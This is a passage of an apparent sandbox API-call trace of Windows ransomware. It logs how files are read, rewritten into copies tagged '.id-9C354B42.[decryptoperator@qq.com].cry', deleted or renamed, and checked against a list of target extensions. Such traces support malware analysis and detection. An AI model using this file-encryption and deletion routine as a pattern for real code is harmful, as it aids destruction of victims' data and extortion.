SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0049.005] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0049.005] GetLastError () returned 0x0 [0049.005] ReadFile (in: hFile=0x190, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0xe2aa, lpOverlapped=0x0) returned 1 [0049.390] WriteFile (in: hFile=0x194, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xe2b0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xe2b0, lpOverlapped=0x0) returned 1 [0049.391] ReadFile (in: hFile=0x190, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0049.391] WriteFile (in: hFile=0x194, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0049.391] SetEndOfFile (hFile=0x194) returned 1 [0049.391] CloseHandle (hObject=0x194) returned 1 [0049.392] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0049.392] SetEndOfFile (hFile=0x190) returned 1 [0049.393] CloseHandle (hObject=0x190) returned 1 [0049.393] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0049.393] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm")) returned 1 [0049.393] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0049.393] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0049.393] lstrlenW (lpString=".doc") returned 4 [0049.393] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0049.393] lstrlenW (lpString=".docx") returned 5 [0049.393] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0049.393] lstrlenW (lpString=".pdf") returned 4 [0049.393] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0049.393] lstrlenW (lpString=".xls") returned 4 [0049.393] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0049.393] lstrlenW (lpString=".xlsx") returned 5 [0049.393] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0049.393] lstrlenW (lpString=".ppt") returned 4 [0049.393] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0049.393] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0049.393] lstrlenW (lpString=".zip") returned 4 [0049.394] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0049.394] lstrlenW (lpString=".rar") returned 4 [0049.394] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0049.394] lstrlenW (lpString=".bz2") returned 4 [0049.394] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0049.394] lstrlenW (lpString=".7z") returned 3 [0049.394] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0049.394] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0049.394] lstrlenW (lpString=".dbf") returned 4 [0049.394] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0049.394] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0049.394] lstrlenW (lpString=".1cd") returned 4 [0049.394] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0049.394] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0049.394] lstrlenW (lpString=".jpg") returned 4 [0049.394] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0049.532] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0049.532] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0049.532] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0049.532] GetLastError () returned 0x0 [0049.532] ReadFile (in: hFile=0x1bc, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x2cc, lpOverlapped=0x0) returned 1 [0049.573] WriteFile (in: hFile=0x20c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x2d0, lpOverlapped=0x0) returned 1 [0049.574] ReadFile (in: hFile=0x1bc, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0049.574] WriteFile (in: hFile=0x20c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xfc, lpOverlapped=0x0) returned 1 [0049.574] SetEndOfFile (hFile=0x20c) returned 1 [0049.574] CloseHandle (hObject=0x20c) returned 1 [0049.574] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0049.574] SetEndOfFile (hFile=0x1bc) returned 1 [0049.575] CloseHandle (hObject=0x1bc) returned 1 [0049.575] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0049.575] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config")) returned 1 [0049.575] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0049.575] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0049.575] lstrlenW (lpString=".doc") returned 4 [0049.575] lstrcmpiW (lpString1=".doc", lpString2="nfig") returned -1 [0049.575] lstrlenW (lpString=".docx") returned 5 [0049.575] lstrcmpiW (lpString1=".docx", lpString2="onfig") returned -1 [0049.575] lstrlenW (lpString=".pdf") returned 4 [0049.575] lstrcmpiW (lpString1=".pdf", lpString2="nfig") returned -1 [0049.575] lstrlenW (lpString=".xls") returned 4 [0049.575] lstrcmpiW (lpString1=".xls", lpString2="nfig") returned -1 [0049.575] lstrlenW (lpString=".xlsx") returned 5 [0049.576] lstrcmpiW (lpString1=".xlsx", lpString2="onfig") returned -1 [0049.576] lstrlenW (lpString=".ppt") returned 4 [0049.576] lstrcmpiW (lpString1=".ppt", lpString2="nfig") returned -1 [0049.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0049.576] lstrlenW (lpString=".zip") returned 4 [0049.576] lstrcmpiW (lpString1=".zip", lpString2="nfig") returned -1 [0049.576] lstrlenW (lpString=".rar") returned 4 [0049.576] lstrcmpiW (lpString1=".rar", lpString2="nfig") returned -1 [0049.576] lstrlenW (lpString=".bz2") returned 4 [0049.576] lstrcmpiW (lpString1=".bz2", lpString2="nfig") returned -1 [0049.576] lstrlenW (lpString=".7z") returned 3 [0049.576] lstrcmpiW (lpString1=".7z", lpString2="fig") returned -1 [0049.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0049.576] lstrlenW (lpString=".dbf") returned 4 [0049.576] lstrcmpiW (lpString1=".dbf", lpString2="nfig") returned -1 [0049.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0049.576] lstrlenW (lpString=".1cd") returned 4 [0049.576] lstrcmpiW (lpString1=".1cd", lpString2="nfig") returned -1 [0049.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0049.576] lstrlenW (lpString=".jpg") returned 4 [0049.576] lstrcmpiW (lpString1=".jpg", lpString2="nfig") returned -1 [0049.995] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page.wmv.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0 [0049.995] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv") returned 70 [0049.995] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv") returned 70 [0049.995] lstrlenW (lpString=".doc") returned 4 [0049.995] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0049.995] lstrlenW (lpString=".docx") returned 5 [0049.996] lstrcmpiW (lpString1=".docx", lpString2="e.wmv") returned -1 [0049.996] lstrlenW (lpString=".pdf") returned 4 [0049.996] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0049.996] lstrlenW (lpString=".xls") returned 4 [0049.996] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0049.996] lstrlenW (lpString=".xlsx") returned 5 [0049.996] lstrcmpiW (lpString1=".xlsx", lpString2="e.wmv") returned -1 [0049.996] lstrlenW (lpString=".ppt") returned 4 [0049.996] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0049.996] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv") returned 70 [0049.996] lstrlenW (lpString=".zip") returned 4 [0049.996] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0049.996] lstrlenW (lpString=".rar") returned 4 [0049.996] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0049.996] lstrlenW (lpString=".bz2") returned 4 [0049.996] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0049.996] lstrlenW (lpString=".7z") returned 3 [0049.996] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0049.996] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv") returned 70 [0049.996] lstrlenW (lpString=".dbf") returned 4 [0049.996] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0049.996] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv") returned 70 [0049.996] lstrlenW (lpString=".1cd") returned 4 [0049.996] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0049.996] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv") returned 70 [0049.997] lstrlenW (lpString=".jpg") returned 4 [0049.997] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0049.997] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0 [0049.997] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74 [0049.997] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74 [0049.997] lstrlenW (lpString=".doc") returned 4 [0049.997] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0049.997] lstrlenW (lpString=".docx") returned 5 [0049.997] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0049.997] lstrlenW (lpString=".pdf") returned 4 [0049.997] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0049.997] lstrlenW (lpString=".xls") returned 4 [0049.997] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0049.997] lstrlenW (lpString=".xlsx") returned 5 [0049.997] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0049.997] lstrlenW (lpString=".ppt") returned 4 [0049.997] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0049.997] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74 [0049.997] lstrlenW (lpString=".zip") returned 4 [0049.997] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0049.997] lstrlenW (lpString=".rar") returned 4 [0049.997] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0049.997] lstrlenW (lpString=".bz2") returned 4 [0049.997] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0049.997] lstrlenW (lpString=".7z") returned 3 [0049.997] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0049.997] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74 [0049.998] lstrlenW (lpString=".dbf") returned 4 [0049.998] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0049.998] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74 [0049.998] lstrlenW (lpString=".1cd") returned 4 [0049.998] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0049.998] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74 [0049.998] lstrlenW (lpString=".jpg") returned 4 [0049.998] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0050.064] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0 [0050.064] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0050.064] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0050.064] lstrlenW (lpString=".doc") returned 4 [0050.064] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0050.064] lstrlenW (lpString=".docx") returned 5 [0050.064] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0050.064] lstrlenW (lpString=".pdf") returned 4 [0050.064] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0050.064] lstrlenW (lpString=".xls") returned 4 [0050.064] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0050.064] lstrlenW (lpString=".xlsx") returned 5 [0050.064] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0050.064] lstrlenW (lpString=".ppt") returned 4 [0050.064] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0050.064] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0050.064] lstrlenW (lpString=".zip") returned 4 [0050.064] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0050.064] lstrlenW (lpString=".rar") returned 4 [0050.064] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0050.064] lstrlenW (lpString=".bz2") returned 4 [0050.064] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0050.064] lstrlenW (lpString=".7z") returned 3 [0050.064] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0050.064] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0050.064] lstrlenW (lpString=".dbf") returned 4 [0050.064] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0050.064] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0050.064] lstrlenW (lpString=".1cd") returned 4 [0050.064] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0050.064] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0050.064] lstrlenW (lpString=".jpg") returned 4 [0050.065] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0050.065] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0 [0050.065] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0050.065] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0050.065] lstrlenW (lpString=".doc") returned 4 [0050.065] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0050.065] lstrlenW (lpString=".docx") returned 5 [0050.065] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0050.065] lstrlenW (lpString=".pdf") returned 4 [0050.065] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0050.065] lstrlenW (lpString=".xls") returned 4 [0050.065] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0050.065] lstrlenW (lpString=".xlsx") returned 5 [0050.065] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0050.065] lstrlenW (lpString=".ppt") returned 4 [0050.065] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0050.065] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0050.065] lstrlenW (lpString=".zip") returned 4 [0050.065] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0050.065] lstrlenW (lpString=".rar") returned 4 [0050.065] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0050.065] lstrlenW (lpString=".bz2") returned 4 [0050.065] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0050.065] lstrlenW (lpString=".7z") returned 3 [0050.065] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0050.065] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0050.065] lstrlenW (lpString=".dbf") returned 4 [0050.065] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0050.065] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0050.065] lstrlenW (lpString=".1cd") returned 4 [0050.066] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0050.066] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0050.066] lstrlenW (lpString=".jpg") returned 4 [0050.066] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0050.066] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0 [0050.066] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0050.066] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0050.066] lstrlenW (lpString=".doc") returned 4 [0050.066] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0050.066] lstrlenW (lpString=".docx") returned 5 [0050.066] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0050.066] lstrlenW (lpString=".pdf") returned 4 [0050.066] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0050.066] lstrlenW (lpString=".xls") returned 4 [0050.066] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0050.066] lstrlenW (lpString=".xlsx") returned 5 [0050.066] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0050.066] lstrlenW (lpString=".ppt") returned 4 [0050.066] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0050.066] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0050.066] lstrlenW (lpString=".zip") returned 4 [0050.066] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0050.066] lstrlenW (lpString=".rar") returned 4 [0050.066] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0050.066] lstrlenW (lpString=".bz2") returned 4 [0050.066] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0050.066] lstrlenW (lpString=".7z") returned 3 [0050.066] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0050.066] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0050.066] lstrlenW (lpString=".dbf") returned 4 [0050.067] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0050.067] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0050.067] lstrlenW (lpString=".1cd") returned 4 [0050.067] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0050.067] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0050.067] lstrlenW (lpString=".jpg") returned 4 [0050.067] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0050.067] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0 [0050.067] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0050.067] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0050.067] lstrlenW (lpString=".doc") returned 4 [0050.067] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0050.068] lstrlenW (lpString=".docx") returned 5 [0050.068] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0050.068] lstrlenW (lpString=".pdf") returned 4 [0050.068] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0050.068] lstrlenW (lpString=".xls") returned 4 [0050.068] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0050.068] lstrlenW (lpString=".xlsx") returned 5 [0050.068] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0050.068] lstrlenW (lpString=".ppt") returned 4 [0050.068] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0050.068] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0050.068] lstrlenW (lpString=".zip") returned 4 [0050.068] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0050.068] lstrlenW (lpString=".rar") returned 4 [0050.068] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0050.068] lstrlenW (lpString=".bz2") returned 4 [0050.068] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0050.068] lstrlenW (lpString=".7z") returned 3 [0050.068] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0050.068] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0050.068] lstrlenW (lpString=".dbf") returned 4 [0050.068] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0050.068] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0050.068] lstrlenW (lpString=".1cd") returned 4 [0050.068] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0050.068] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0050.068] 